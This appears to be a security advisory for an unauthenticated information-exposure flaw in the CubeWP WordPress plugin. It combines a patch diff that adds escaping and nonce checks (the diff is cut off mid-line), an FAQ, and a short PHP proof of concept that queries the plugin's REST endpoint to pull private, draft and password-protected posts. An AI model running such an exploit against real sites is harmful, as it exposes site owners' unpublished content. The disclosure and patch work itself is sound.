+++ b/cubewp-framework/cube/classes/class-cubewp-enqueue.php
@@ -6,6 +6,8 @@
  * @package cubewp/cube/classes
  */

+// phpcs:disable WordPress.NamingConventions.PrefixAllGlobals
+
 if ( ! defined( 'ABSPATH' ) ) {
 	exit;
 }
@@ -80,7 +82,10 @@
 			}
 		}

-		echo apply_filters( 'frontend/script/enqueue', '' );
+		$cubewp_front_inline = apply_filters( 'frontend/script/enqueue', '' );
+		if ( ! empty( $cubewp_front_inline ) ) {
+			echo wp_kses_post( $cubewp_front_inline );
+		}
 		self::cubewp_enqueue_settings_css_js();

 	}
@@ -359,9 +364,10 @@
 			  global $cwpOptions;
 			  $cwpOptions = ! empty( $cwpOptions ) && is_array( $cwpOptions ) ? $cwpOptions : get_option( 'cwpOptions' );
 			  $cubewp_css = isset( $cwpOptions['cubewp-css'] ) && ! empty( $cwpOptions['cubewp-css'] ) ? $cwpOptions['cubewp-css'] : '';
-			  echo '<style type="text/css">
-				 ' . $cubewp_css . '
-				</style>';
+			  if ( ! empty( $cubewp_css ) ) {
+				  // Attach custom CSS inline to a known handle to avoid raw echo.
+				  wp_add_inline_style( 'cwp-styles', $cubewp_css );
+			  }
 		   } );

 		   add_action( 'wp_footer', function(){
@@ -369,9 +375,10 @@
 			  $cwpOptions = ! empty( $cwpOptions ) && is_array( $cwpOptions ) ? $cwpOptions : get_option( 'cwpOptions' );
 			  $cubewp_js = isset( $cwpOptions['cubewp-js'] ) && ! empty( $cwpOptions['cubewp-js'] ) ? $cwpOptions['cubewp-js'] : '';
 			  wp_enqueue_script( 'jquery' );
-			  echo '<script type="text/javascript">
-				 ' . $cubewp_js . '
-				</script>';
+			  if ( ! empty( $cubewp_js ) ) {
+				  // Attach custom JS inline to jQuery handle to avoid raw echo.
+				  wp_add_inline_script( 'jquery', $cubewp_js );
+			  }
 		   } );
 		}
 	}
--- a/cubewp-framework/cube/classes/class-cubewp-export.php
+++ b/cubewp-framework/cube/classes/class-cubewp-export.php
@@ -67,7 +67,7 @@
         <form class="export-form" method="post" action="">
             <input type="hidden" name="action" value="cwp_export_data">
             <input type="hidden" name="cwp_export_type" value="all">
-            <input type="hidden" name="cwp_export_nonce" value="<?php echo wp_create_nonce( 'cwp_export_data_nonce' ); ?>">
+            <input type="hidden" name="cwp_export_nonce" value="<?php echo esc_attr( wp_create_nonce( 'cwp_export_data_nonce' ) ); ?>">
             <div class="cubewp-import-box-container">
                 <div class="cubewp-import-box">
                     <div class="cubewp-import-card">
@@ -207,15 +207,15 @@
             wp_send_json( array( 'success' => 'false', 'msg' => esc_html__('You do not have permission to perform this action.', 'cubewp-framework') ) );
             wp_die();
         }
-        if ( !isset($_POST['nonce']) || !wp_verify_nonce($_POST['nonce'], 'cubewp-admin-nonce') ) {
+        if ( !isset($_POST['nonce']) || !wp_verify_nonce(sanitize_text_field(wp_unslash($_POST['nonce'])), 'cubewp-admin-nonce') ) {
             wp_send_json( array( 'success' => 'false', 'msg' => esc_html__('Invalid nonce. You are not authorized to perform this action.', 'cubewp-framework') ) );
             wp_die();
         }
-        if(isset($_POST['export']) && $_POST['export'] == 'success'){
+        if(isset($_POST['export']) && sanitize_text_field(wp_unslash($_POST['export'])) == 'success'){
             $buffer = self::cwp_custom_fields_posts('cwp_user_fields');
             $files = self::cwp_file_names();
             if (self::cwp_file_force_contents($files['cwp_user_groups'], $buffer)) {
-                $download_now = isset( $_POST['download_now'] ) ? sanitize_text_field( $_POST['download_now'] ) : 'true';
+                $download_now = isset( $_POST['download_now'] ) ? sanitize_text_field( wp_unslash( $_POST['download_now'] ) ) : 'true';
                 if ( $download_now != 'false' ) {
                     self::cwp_create_zip_file();
                 }
@@ -238,11 +238,11 @@
             wp_send_json( array( 'success' => 'false', 'msg' => esc_html__('You do not have permission to perform this action.', 'cubewp-framework') ) );
             wp_die();
         }
-        if ( !isset($_POST['nonce']) || !wp_verify_nonce($_POST['nonce'], 'cubewp-admin-nonce') ) {
+        if ( !isset($_POST['nonce']) || !wp_verify_nonce(sanitize_text_field(wp_unslash($_POST['nonce'])), 'cubewp-admin-nonce') ) {
             wp_send_json( array( 'success' => 'false', 'msg' => esc_html__('Invalid nonce. You are not authorized to perform this action.', 'cubewp-framework') ) );
             wp_die();
         }
-        if(isset($_POST['export']) && $_POST['export'] == 'success'){
+        if(isset($_POST['export']) && sanitize_text_field(wp_unslash($_POST['export'])) == 'success'){
             $buffer = self::cwp_custom_fields_posts('cwp_forms');
             $files = self::cwp_file_names();
             if (self::cwp_file_force_contents($files['cwp_custom_forms'], $buffer)) {
@@ -272,7 +272,7 @@
             wp_send_json( array( 'success' => 'false', 'msg' => esc_html__('You do not have permission to perform this action.', 'cubewp-framework') ) );
             wp_die();
         }
-        if ( !isset($_POST['cwp_export_nonce']) || !wp_verify_nonce($_POST['cwp_export_nonce'], 'cwp_export_data_nonce') ) {
+        if ( !isset($_POST['cwp_export_nonce']) || !wp_verify_nonce(sanitize_text_field(wp_unslash($_POST['cwp_export_nonce'])), 'cwp_export_data_nonce') ) {
             wp_send_json( array( 'success' => 'false', 'msg' => esc_html__('Invalid nonce. You are not authorized to perform this action.', 'cubewp-framework') ) );
             wp_die();
         }
@@ -285,6 +285,7 @@
 				));
 			} else {
 				$export_content = array();
+                /* phpcs:ignore WordPress.Security.ValidatedSanitizedInput.MissingUnslash, WordPress.Security.ValidatedSanitizedInput.InputNotSanitized */
 				foreach ($_POST['cwp_export_content_type'] as $content_type) {
 					switch ($content_type) {
 						case 'post_types':
@@ -398,11 +399,11 @@
         $post_cards_dir = $upload_dir['basedir'] . '/cubewp-post-cards';

         if (!is_dir($export_path)) {
-            mkdir($export_path, 0755, true); // Ensure export directory exists
+            wp_mkdir_p( $export_path );
         }

         if (file_exists($export_path . $DelFilePath)) {
-            unlink($export_path . $DelFilePath);
+            wp_delete_file($export_path . $DelFilePath);
         }

         if ($zip->open($export_path . $DelFilePath, ZIPARCHIVE::CREATE) !== TRUE) {
@@ -414,8 +415,8 @@
         $zip->addFile($files['cwp_post_groups'], 'cwp_post_groups.json');
         $zip->addFile($files['cwp_user_groups'], 'cwp_user_groups.json');
         $zip->addFile($files['cwp_custom_forms'], 'cwp_custom_forms.json');
-
-        $export_post_cards = isset($_POST['export_post_cards']) ? sanitize_text_field($_POST['export_post_cards']) : 'false';
+        /*phpcs:ignore WordPress.Security.NonceVerification.Recommended, WordPress.Security.NonceVerification.Missing */
+        $export_post_cards = isset($_POST['export_post_cards']) ? sanitize_text_field(wp_unslash($_POST['export_post_cards'])) : 'false';
         // Add "cubewp-post-cards" to the zip archive
         if ($export_post_cards == 'true' && is_dir($post_cards_dir)) {
             $this->add_post_cards_folder_to_zip($post_cards_dir, $zip, 'cubewp-post-cards');
@@ -425,10 +426,10 @@
         $zip->close();

         // Cleanup temporary files
-        unlink($files['setup_file']);
-        unlink($files['cwp_post_groups']);
-        unlink($files['cwp_user_groups']);
-        unlink($files['cwp_custom_forms']);
+        wp_delete_file($files['setup_file']);
+        wp_delete_file($files['cwp_post_groups']);
+        wp_delete_file($files['cwp_user_groups']);
+        wp_delete_file($files['cwp_custom_forms']);
     }

     /**
@@ -464,11 +465,11 @@
      * Method cwp_file_force_contents
      *
      * @param string $file_path
-     * @param Json $file_content
-     * @param bolean $flags
+     * @param string $file_content
+     * @param int $flags
      * @param int $permissions
      *
-     * @return Json
+     * @return boolean
 	 * @since  1.0.0
      */
     private static function cwp_file_force_contents($file_path, $file_content, $flags = 0, $permissions = 0777) {
@@ -476,8 +477,9 @@
 		array_pop($parts);
 		$dir = implode('/', $parts);

-		if ( ! is_dir($dir)) {
-			mkdir($dir, $permissions, true);
+		if ( ! is_dir( $dir ) ) {
+			// Use WordPress API to create directories recursively.
+			wp_mkdir_p( $dir );
 		}

 		return file_put_contents($file_path, $file_content, $flags);
--- a/cubewp-framework/cube/classes/class-cubewp-form-builder.php
+++ b/cubewp-framework/cube/classes/class-cubewp-form-builder.php
@@ -30,17 +30,25 @@
             wp_send_json( array( 'success' => 'false', 'msg' => esc_html__('You do not have permission to perform this action.', 'cubewp-framework') ) );
             wp_die();
         }
-        $form_relation = isset( $_POST['form_relation'] ) ? sanitize_text_field( $_POST['form_relation'] ) : '';
-        $form_type     = isset( $_POST['form_type'] ) ? sanitize_text_field( $_POST['form_type'] ) : '';
+        // phpcs:ignore WordPress.Security.NonceVerification.Missing
+        $form_relation = isset( $_POST['form_relation'] ) ? sanitize_text_field( wp_unslash( $_POST['form_relation'] ) ) : '';
+        // phpcs:ignore WordPress.Security.NonceVerification.Missing
+        $form_type     = isset( $_POST['form_type'] ) ? sanitize_text_field( wp_unslash( $_POST['form_type'] ) ) : '';
         if ( $form_type != '' ) {
             $cwp_forms = CWP()->get_form( $form_type );
             if ( isset( $form_relation ) && ! empty( $form_relation ) ) {
+                // phpcs:ignore WordPress.Security.NonceVerification.Missing
                 if ( isset( $_POST['cwpform'] ) && ! empty( $_POST['cwpform'] ) ) {

                     if ( $form_type == 'loop_builder' ) {
+                        /*phpcs:ignore WordPress.Security.ValidatedSanitizedInput.MissingUnslash, WordPress.Security.ValidatedSanitizedInput.InputNotSanitized, WordPress.Security.NonceVerification.Missing */
                         $cwp_forms[ $form_relation ] = apply_filters( 'cubewp/loop/builder/save', array() , $_POST['cwpform'], $form_relation );
                     }else {
-                        $cwp_forms[ $form_relation ] = CubeWp_Sanitize_Dynamic_Array( $_POST['cwpform'][ $form_relation ] );
+                        // phpcs:ignore WordPress.Security.NonceVerification.Missing
+                        if(isset($_POST['cwpform'][ $form_relation ])){
+                            /*phpcs:ignore WordPress.Security.ValidatedSanitizedInput.MissingUnslash, WordPress.Security.ValidatedSanitizedInput.InputNotSanitized, WordPress.Security.NonceVerification.Missing */
+                            $cwp_forms[ $form_relation ] = CubeWp_Sanitize_Dynamic_Array( $_POST['cwpform'][ $form_relation ] );
+                        }
                     }

                     CWP()->update_form( $form_type, $cwp_forms );
@@ -66,10 +74,12 @@
             wp_die();
         }
         $section_args = [];
+        // phpcs:ignore WordPress.Security.NonceVerification.Missing
         if(isset($_POST['action'])){
-            unset($_POST['action']);
-            unset($_POST['section_id']);
+            unset($_POST['action']);// phpcs:ignore WordPress.Security.NonceVerification.Missing
+            unset($_POST['section_id']);// phpcs:ignore WordPress.Security.NonceVerification.Missing
         }
+        // phpcs:ignore WordPress.Security.NonceVerification.Missing
         if(isset($_POST['form_relation']) && isset($_POST['form_type'])){
             foreach($_POST as $key => $POST){
                 $section_args[$key] = $POST;
@@ -91,7 +101,7 @@
      */
     public function cwpform_form_section( $args = array() ) {
         $defaults         = array(
-            'section_id'          => rand( 123456789, 111111111 ),
+            'section_id'          => wp_rand( 123456789, 111111111 ),
             'section_title'       => '',
             'section_description' => '',
             'section_type'        => '',
@@ -449,9 +459,9 @@
                 'name'        => 'display_ui',
                 'value'       => $appearance,
                 'options'     => array(
-                    'select'       => __( "Dropdown" ),
-                    'multi_select' => __( "Multi Dropdown" ),
-                    'checkbox'     => __( "checkbox" )
+                    'select'       => __( "Dropdown", "cubewp-framework" ),
+                    'multi_select' => __( "Multi Dropdown", "cubewp-framework" ),
+                    'checkbox'     => __( "checkbox", "cubewp-framework" )
                 ),
                 'extra_attrs' => 'data-name="display_ui"',
             );
@@ -463,7 +473,7 @@
                 'class'       => 'group-field field-select2_ui',
                 'name'        => 'select2_ui',
                 'value'       => isset( $field['select2_ui'] ) && ! empty( $field['select2_ui'] ) ? $field['select2_ui'] : '0',
-                'options'     => array( '0' => __( "No" ), '1' => __( "Yes" ) ),
+                'options'     => array( '0' => __( "No", "cubewp-framework" ), '1' => __( "Yes", "cubewp-framework" ) ),
                 'extra_attrs' => 'data-name="select2_ui"',
             );
             $output      .= cwp_render_dropdown_input( $input_attrs );
@@ -485,7 +495,7 @@
                 'class'       => 'group-field field-select2_ui',
                 'name'        => 'select2_ui',
                 'value'       => isset( $field['select2_ui'] ) && ! empty( $field['select2_ui'] ) ? $field['select2_ui'] : '0',
-                'options'     => array( '0' => __( "No" ), '1' => __( "Yes" ) ),
+                'options'     => array( '0' => __( "No", "cubewp-framework" ), '1' => __( "Yes", "cubewp-framework" ) ),
                 'extra_attrs' => 'data-name="select2_ui"',
             );
             $output      .= cwp_render_dropdown_input( $input_attrs );
@@ -559,7 +569,7 @@
                 'class'       => 'group-field field-required',
                 'name'        => 'required',
                 'value'       => isset( $field['required'] ) ? $field['required'] : $default_required,
-                'options'     => array( '1' => __( "Required" ), '0' => __( "Not required" ) ),
+                'options'     => array( '1' => __( "Required", "cubewp-framework" ), '0' => __( "Not required", "cubewp-framework" ) ),
                 'extra_attrs' => 'data-name="required"',
             );
             $output      .= cwp_render_dropdown_input( $input_attrs );
@@ -597,7 +607,7 @@
                 'class'       => 'group-field field-sorting',
                 'name'        => 'sorting',
                 'value'       => isset( $field['sorting'] ) && ! empty( $field['sorting'] ) ? $field['sorting'] : '',
-                'options'     => array( '1' => __( "Yes" ), '0' => __( "No" ) ),
+                'options'     => array( '1' => __( "Yes", "cubewp-framework" ), '0' => __( "No", "cubewp-framework" ) ),
                 'extra_attrs' => 'data-name="sorting"',
             );
             $output      .= cwp_render_dropdown_input( $input_attrs );
@@ -774,7 +784,7 @@
                         if(!empty($fields)){
                             foreach($fields as $input_attr){
                                 if($input_attr['type'] == 'hidden'){
-                                    echo call_user_func('cwp_render_hidden_input',$input_attr);
+                                    echo call_user_func('cwp_render_hidden_input', $input_attr); // phpcs:ignore WordPress.Security.EscapeOutput.OutputNotEscaped
                                 }else{
                                     $field_type = $input_attr['type'];
                                     if(isset($input_attr['input_type']) && !empty($input_attr['input_type'])){
@@ -783,9 +793,9 @@
                                     ?>
                                     <div class="section-form-field">
                                         <?php if(isset($input_attr['label']) && !empty($input_attr['label'])){ ?>
-                                        <label for="section_class"><?php echo $input_attr['label']; ?></label>
+                                        <label for="section_class"><?php echo esc_html( $input_attr['label'] ); ?></label>
                                         <?php } ?>
-                                        <?php echo call_user_func('cwp_render_'.$field_type.'_input',$input_attr); ?>
+                                        <?php echo call_user_func( 'cwp_render_'.$field_type.'_input', $input_attr ); // phpcs:ignore WordPress.Security.EscapeOutput.OutputNotEscaped ?>
                                     </div>
                                     <?php
                                 }
--- a/cubewp-framework/cube/classes/class-cubewp-forms-pro.php
+++ b/cubewp-framework/cube/classes/class-cubewp-forms-pro.php
@@ -31,14 +31,14 @@
 		$page_header="CubeWP Forms";
 		$background_image_src = CWP_PLUGIN_URI.'cube/assets/admin/images/forms-templates.png';
 		echo'<div id="cubewp-title-bar">
-			<h1>'.$page_header.'</h1>
+			<h1>'.esc_html($page_header).'</h1>
 		</div>
 		<div class="cubewp-subscription-frame forms-templates" style="background:#f0f0f1 0% 0% no-repeat padding-box;">
-			<img class="cubewp-subscription-frame-bg" src="'.$background_image_src.'" alt="">
+			<img class="cubewp-subscription-frame-bg" src="'.esc_url($background_image_src).'" alt="">
 			<div class="cubewp-subscription-main">
 				<div class="cubewp-subscription-form">
 					<div class="cube-subscription-header forms-templates">
-						<img class="subscription-header-super" src="'.CWP_PLUGIN_URI.'cube/assets/admin/images/forms.svg" alt="image">
+						<img class="subscription-header-super" src="'.esc_url(CWP_PLUGIN_URI.'cube/assets/admin/images/forms.svg').'" alt="image">
 					</div>
 					<div class="cubewp-subscription-contant forms-templates">
 						<div class="cubewp-subscription-logo">
--- a/cubewp-framework/cube/classes/class-cubewp-frontend-alerts.php
+++ b/cubewp-framework/cube/classes/class-cubewp-frontend-alerts.php
@@ -68,7 +68,10 @@
                             <svg xmlns="http://www.w3.org/2000/svg" width="14" height="14" fill="currentColor"  viewBox="0 0 16 16">
                               <path d="M12.854.146a.5.5 0 0 0-.707 0L10.5 1.793 14.207 5.5l1.647-1.646a.5.5 0 0 0 0-.708l-3-3zm.646 6.061L9.793 2.5 3.293 9H3.5a.5.5 0 0 1 .5.5v.5h.5a.5.5 0 0 1 .5.5v.5h.5a.5.5 0 0 1 .5.5v.5h.5a.5.5 0 0 1 .5.5v.207l6.5-6.5zm-7.468 7.468A.5.5 0 0 1 6 13.5V13h-.5a.5.5 0 0 1-.5-.5V12h-.5a.5.5 0 0 1-.5-.5V11h-.5a.5.5 0 0 1-.5-.5V10h-.5a.499.499 0 0 1-.175-.032l-.179.178a.5.5 0 0 0-.11.168l-2 5a.5.5 0 0 0 .65.65l5-2a.5.5 0 0 0 .168-.11l.178-.178z"/>
                             </svg>
-                            <?php echo sprintf(esc_html__('Edit this %s', 'cubewp-framework'), get_post_type_object( $post_type )->labels->singular_name) ?>
+                            <?php
+                            /* translators: %s: post type singular name. */
+                            echo sprintf( esc_html__( 'Edit this %s', 'cubewp-framework' ), esc_html( get_post_type_object( $post_type )->labels->singular_name ) );
+                            ?>
                         </button>
                     </a>
                 <?php } ?>
@@ -104,8 +107,10 @@

     public function cubewp_get_notification_msg(){
         $free_msg =  true;
+        // phpcs:ignore WordPress.Security.NonceVerification.Recommended -- Read-only use of query vars to render notice; no state change performed.
         if(isset($_GET['p']) && isset($_GET['post_type']) && !is_admin()) {
-            $post_id   =   wp_kses_post($_GET['p']);
+            // phpcs:ignore WordPress.Security.NonceVerification.Recommended -- Read-only use of query vars to render notice; no state change performed.
+            $post_id   =   wp_kses_post(wp_unslash($_GET['p']));
             $plan_id   =   get_post_meta($post_id, 'plan_id', true);
             if( $plan_id > 0 ) {
                 $plan_price =   get_post_meta($plan_id, 'plan_price', true);
@@ -115,9 +120,11 @@
             }
         }
         if( $free_msg ){
-            return sprintf(__('Your %s is pending for review.', 'cubewp-framework'), get_post_type_object( get_post_type($post_id) )->labels->singular_name);
+            /* translators: %s: post type singular name. */
+            return sprintf( __('Your %s is pending for review.', 'cubewp-framework'), get_post_type_object( get_post_type($post_id) )->labels->singular_name );
         }else{
-            return sprintf(__('Your %s is pending! Please proceed to make it published', 'cubewp-framework'), get_post_type_object( get_post_type($post_id) )->labels->singular_name);
+            /* translators: %s: post type singular name. */
+            return sprintf( __('Your %s is pending! Please proceed to make it published', 'cubewp-framework'), get_post_type_object( get_post_type($post_id) )->labels->singular_name );
         }

     }
--- a/cubewp-framework/cube/classes/class-cubewp-frontend-templates.php
+++ b/cubewp-framework/cube/classes/class-cubewp-frontend-templates.php
@@ -1,5 +1,4 @@
 <?php
-
 /**
  * CubeWp Frontend templates is for display of single post and archive templates
  *
@@ -7,6 +6,8 @@
  * @package cubewp/cube/classes
  */

+ // phpcs:disable WordPress.NamingConventions.PrefixAllGlobals
+
 if ( ! defined( 'ABSPATH' ) ) {
 	exit;
 }
@@ -86,7 +87,7 @@
                     $hook = get_post_meta( $template_id, 'template_location', true );
                     $content_to_echo = CubeWp_Theme_Builder::do_cubewp_theme_builder('block', $template_id, true);
                     add_action( $hook, function() use ( $content_to_echo ) {
-                        echo $content_to_echo;
+                        echo wp_kses_post($content_to_echo);
                     });
                 }
             }
@@ -351,9 +352,11 @@
                 'author.php'
             );
         }elseif (is_search()) {
+            // phpcs:ignore WordPress.Security.NonceVerification.Recommended -- Read-only use of query vars to render notice; no state change performed.
             if ( isset( $_GET['post_type'] ) && !empty( $_GET['post_type'] ) ) {
                 // Sanitize the post_type value from the query string
-                $post_type = sanitize_text_field( $_GET['post_type'] );
+                // phpcs:ignore WordPress.Security.NonceVerification.Recommended -- Read-only use of query vars to render notice; no state change performed.
+                $post_type = sanitize_text_field( wp_unslash($_GET['post_type']) );

                 // Define the template array
                 $templates = array(
--- a/cubewp-framework/cube/classes/class-cubewp-frontend.php
+++ b/cubewp-framework/cube/classes/class-cubewp-frontend.php
@@ -421,6 +421,7 @@
             </div>
         </div>';

+        // phpcs:ignore WordPress.Security.EscapeOutput.OutputNotEscaped
         echo apply_filters('cubewp/frontend/archive/list/switcher', $output);
     }

@@ -449,11 +450,13 @@
             'class'        => 'cwp-orderby',
             'id'           => 'cwp-sorting-filter',
             'name'         => 'cwp_orderby',
-            'value'        => isset($_GET['orderby']) && !empty($_GET['orderby']) ? sanitize_text_field($_GET['orderby']) : 'DESC',
+            // phpcs:ignore WordPress.Security.NonceVerification.Recommended -- Read-only use of query vars to render notice; no state change performed.
+            'value'        => isset($_GET['orderby']) && !empty($_GET['orderby']) ? sanitize_text_field(wp_unslash($_GET['orderby'])) : 'DESC',
             'options'      => $option,
             'extra_attrs'  => '',
             'placeholder'  => esc_html__('Sort By','cubewp-framework')
         );
+        // phpcs:ignore WordPress.Security.EscapeOutput.OutputNotEscaped
         echo cwp_render_dropdown_input( $input_attrs );
     }

--- a/cubewp-framework/cube/classes/class-cubewp-import.php
+++ b/cubewp-framework/cube/classes/class-cubewp-import.php
@@ -1,5 +1,4 @@
 <?php
-
 /**
  * CubeWp Import to import only cubewp related data.
  *
@@ -7,6 +6,8 @@
  * @package cubewp/cube/classes
  */

+// phpcs:disable WordPress.NamingConventions.PrefixAllGlobals
+
 if (! defined('ABSPATH')) {
     exit;
 }
@@ -23,8 +24,10 @@
         add_action('cubewp_import', array($this, 'manage_import'));
         add_action('wp_ajax_cwp_import_data', array($this, 'cwp_import_data_callback'));
         add_action('wp_ajax_cwp_import_dummy_data', array($this, 'cwp_import_dummy_data_callback'));
-        if (isset($_GET['import']) && $_GET['import'] == 'success') {
-            new CubeWp_Admin_Notice("cubewp-import-success", esc_html__('Data Imported Successfully', 'cubewp-framework'), 'success', false);
+        $cwp_import_flag  = isset( $_GET['import'] ) ? sanitize_key( wp_unslash( $_GET['import'] ) ) : '';
+        $cwp_import_nonce = isset( $_GET['security_nonce'] ) ? sanitize_text_field( wp_unslash( $_GET['security_nonce'] ) ) : '';
+        if ( 'success' === $cwp_import_flag && $cwp_import_nonce && wp_verify_nonce( $cwp_import_nonce, 'cwp_import_data_nonce' ) ) {
+            new CubeWp_Admin_Notice( 'cubewp-import-success', esc_html__( 'Data Imported Successfully', 'cubewp-framework' ), 'success', false );
         }
     }

@@ -46,8 +49,12 @@
      */
     public function manage_import()
     {
-        if (isset($_GET['import']) && $_GET['import'] == 'success' && isset($_SESSION['terms'])) {
-            $this->cwp_import_terms(cubewp_core_data($_SESSION['terms']));
+        $cwp_import_flag  = isset( $_GET['import'] ) ? sanitize_key( wp_unslash( $_GET['import'] ) ) : '';
+        $cwp_import_nonce = isset( $_GET['security_nonce'] ) ? sanitize_text_field( wp_unslash( $_GET['security_nonce'] ) ) : '';
+        if ( 'success' === $cwp_import_flag && $cwp_import_nonce && wp_verify_nonce( $cwp_import_nonce, 'cwp_import_data_nonce' ) && isset( $_SESSION['terms'] ) ) {
+            // The imported terms payload is sanitized inside cubewp_core_data().
+            // phpcs:ignore WordPress.Security.ValidatedSanitizedInput.InputNotSanitized
+            $this->cwp_import_terms( cubewp_core_data( $_SESSION['terms'] ) );
             session_destroy();
         }
 ?>
@@ -61,7 +68,7 @@
             </div>
             <form id="import_form" method="post" action="" enctype="multipart/form-data">
                 <input type="hidden" name="action" value="cwp_import_data">
-                <input type="hidden" name="cwp_import_nonce" value="<?php echo wp_create_nonce('cwp_import_data_nonce'); ?>">
+                <input type="hidden" name="cwp_import_nonce" value="<?php echo esc_attr(wp_create_nonce('cwp_import_data_nonce')); ?>">
                 <div class="cubewp-import-box-container">
                     <div class="cubewp-import-box">
                         <div class="cubewp-import-card">
@@ -92,7 +99,7 @@
                             </div>
                         </div>
                         <button type="submit" class="button-primary cwp_import_demo" name="cwp_import">
-                            <?php esc_html_e('Import', 'cubewp'); ?>
+                            <?php esc_html_e('Import', 'cubewp-framework'); ?>
                         </button>
                     </div>
                 </div>
@@ -123,10 +130,11 @@
             if (is_dir($file_path)) {
                 $this->rmdir_recursive($file_path); // Recursive call
             } else {
-                unlink($file_path); // Delete file
+                wp_delete_file($file_path); // Delete file
             }
         }

+        // phpcs:ignore WordPress.WP.AlternativeFunctions.file_system_operations_rmdir
         return rmdir($dir); // Remove directory and return result
     }
     /**
@@ -141,7 +149,7 @@
             // User doesn't have the required capabilities
             wp_send_json(array('success' => 'false', 'msg' => esc_html__("You do not have permission to perform this action.", 'cubewp-framework')));
         }
-        if (isset($_FILES["file"]["name"]) && isset($_POST['cwp_import_nonce']) && wp_verify_nonce($_POST['cwp_import_nonce'], 'cwp_import_data_nonce')) {
+        if (isset($_FILES["file"]["name"]) && isset($_POST['cwp_import_nonce']) && wp_verify_nonce(sanitize_text_field(wp_unslash($_POST['cwp_import_nonce'])), 'cwp_import_data_nonce')) {
             $import_file = $_FILES;
             $filename = sanitize_file_name($import_file["file"]["name"]);
             $source = $import_file["file"]["tmp_name"];
@@ -165,6 +173,7 @@
             $upload_dir = wp_upload_dir();
             $path  = $upload_dir['path'] . '/cubewp/import/';  // absolute path to the directory where zipper.php is in
             if (! is_dir($path)) {
+                // phpcs:ignore WordPress.WP.AlternativeFunctions.file_system_operations_mkdir
                 mkdir($path, 0777, true);
             }
             $filenoext = basename($filename, '.zip');  // absolute path to the directory where zipper.php is in (lowercase)
@@ -178,17 +187,19 @@

             if (is_dir($targetdir))  $this->rmdir_recursive($targetdir);

+            // phpcs:ignore WordPress.WP.AlternativeFunctions.file_system_operations_mkdir
             mkdir($targetdir, 0777);

             /* here it is really happening */

+            // phpcs:ignore Generic.PHP.ForbiddenFunctions.Found
             if (move_uploaded_file($source, $targetzip)) {
                 $zip = new ZipArchive();
                 $x = $zip->open($targetzip);  // open the zip file to extract
                 if ($x === true) {
                     $zip->extractTo($targetdir); // place in the directory with same name
                     $zip->close();
-                    unlink($targetzip);
+                    wp_delete_file($targetzip);
                 }
                 $moved = true;
             } else {
@@ -219,7 +230,7 @@
                 }
                 $message = !empty($message) ? $message : esc_html__('Data imported successfull.', 'cubewp-framework');
                 $this->rmdir_recursive($targetdir);
-                wp_send_json(array('success' => 'true', 'msg' => $message, 'redirectURL' => admin_url('admin.php?page=cubewp-import&import=success')));
+                wp_send_json(array('success' => 'true', 'msg' => $message, 'redirectURL' => admin_url('admin.php?page=cubewp-import&import=success&security_nonce='.wp_create_nonce('cwp_import_data_nonce'))));
             }

             wp_die();
@@ -240,7 +251,7 @@
             wp_send_json(array('success' => 'false', 'msg' => esc_html__('You do not have permission to perform this action.', 'cubewp-framework')));
             wp_die();
         }
-        if (!isset($_POST['nonce']) || !wp_verify_nonce($_POST['nonce'], 'cubewp-admin-nonce')) {
+        if (!isset($_POST['nonce']) || !wp_verify_nonce(sanitize_text_field(wp_uns

Proof of Concept (PHP)

NOTICE :

This proof-of-concept is provided for educational and authorized security research purposes only.

You may not use this code against any system, application, or network without explicit prior authorization from the system owner.

Unauthorized access, testing, or interference with systems may violate applicable laws and regulations in your jurisdiction.

This code is intended solely to illustrate the nature of a publicly disclosed vulnerability in a controlled environment and may be incomplete, unsafe, or unsuitable for real-world use.

By accessing or using this information, you acknowledge that you are solely responsible for your actions and compliance with applicable laws.

PHP PoC

// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
// Atomic Edge CVE Research - Proof of Concept
// CVE-2025-12129 - CubeWP – All-in-One Dynamic Content Framework <= 1.1.27 - Unauthenticated Information Exposure

<?php

$target_url = 'http://example.com/wp-json/cubewp-posts/v1/query';

// Payload to request posts, including private/draft/password-protected ones.
$payload = array(
    'post_type'      => 'post',           // Target post type
    'post_status'    => ['publish', 'private', 'draft', 'password'], // Attempt to get all statuses
    'has_password'   => null,             // Try to bypass password check
    'posts_per_page' => 10,               // Number of posts to retrieve
    'fields'         => 'ids'             // Return post IDs; change to 'all' for full content
);

$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $target_url);
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, json_encode($payload));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_HTTPHEADER, array(
    'Content-Type: application/json',
    'Accept: application/json'
));

$response = curl_exec($ch);
$http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE);
curl_close($ch);

if ($http_code == 200) {
    $data = json_decode($response, true);
    if (isset($data['posts']) && !empty($data['posts'])) {
        echo "[+] SUCCESS: Retrieved " . count($data['posts']) . " post(s).n";
        echo "    Post IDs: " . implode(', ', $data['posts']) . "n";
        // To get full content, re-run with 'fields' => 'all' and iterate through IDs.
    } else {
        echo "[-] No posts returned. The endpoint may be patched or no matching posts exist.n";
    }
} else {
    echo "[-] Request failed with HTTP code: $http_coden";
    echo "    Response: $responsen";
}

?>

Frequently Asked Questions

What is CVE-2025-12129?
Understanding the vulnerability
CVE-2025-12129 is a medium severity vulnerability affecting the CubeWP – All-in-One Dynamic Content Framework plugin for WordPress, specifically versions up to and including 1.1.27. It allows unauthenticated attackers to access sensitive data from posts that should be protected, such as private, draft, or password-protected posts.
How does the vulnerability work?
Mechanism of exploitation
The vulnerability exists due to insufficient access controls in the plugin’s REST API endpoints. Attackers can send unauthenticated HTTP POST requests to specific endpoints, bypassing standard WordPress visibility controls and retrieving data from restricted posts.
Who is affected by this vulnerability?
Identifying impacted users
Any WordPress site using the CubeWP plugin version 1.1.27 or earlier is at risk. Administrators should check their plugin version to determine if they need to take action.
How can I check if my site is vulnerable?
Verifying plugin version
